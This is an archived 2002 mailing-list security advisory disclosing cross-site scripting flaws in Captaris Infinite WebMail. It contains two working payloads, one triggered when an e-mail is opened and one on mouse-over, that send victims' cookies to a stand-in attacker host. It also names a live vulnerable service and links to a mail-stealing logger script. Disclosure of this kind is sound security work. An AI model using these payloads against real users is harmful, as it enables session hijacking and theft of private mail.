OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pedram Amini (pedram_at_redhive.com)
Date: Mon Dec 16 2002 - 17:23:10 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I figured it was about time I hopped on the XSS band-wagon.

    Captaris (www.captaris.com) Infinite WebMail application is vulnerable to
    Cross-Site Scripting (XSS) attacks. The application fails to filter the
    following tags that can both be used to redirect a user to an attack script:

    Launch on e-mail open:
        <p style="left:expression(document.location=
        'http://attackers.server/cgi-bin/logger.cgi?'
        +document.cookie)">

    Launch on mouse over:
        <b onMouseOver= "document.location=
        'http://attackers.server/cgi-bin/logger.cgi?'
        +document.cookie\">

    I am sure there are other XSS attack methods that can also be utilized to
    bypass their basic filtering.

    A sample vulnerable service is provided by dog.com (www.dogmail.com), they
    are running WebMail v3.61.05. A sample cookie and mail logger script that
    will retrieve all of the messages in the users main mailbox has been
    attached, and can also be found at
    http://pedram.redhive.com/advisories/dogmail.cgi

    -pedram
    http://pedram.redhive.com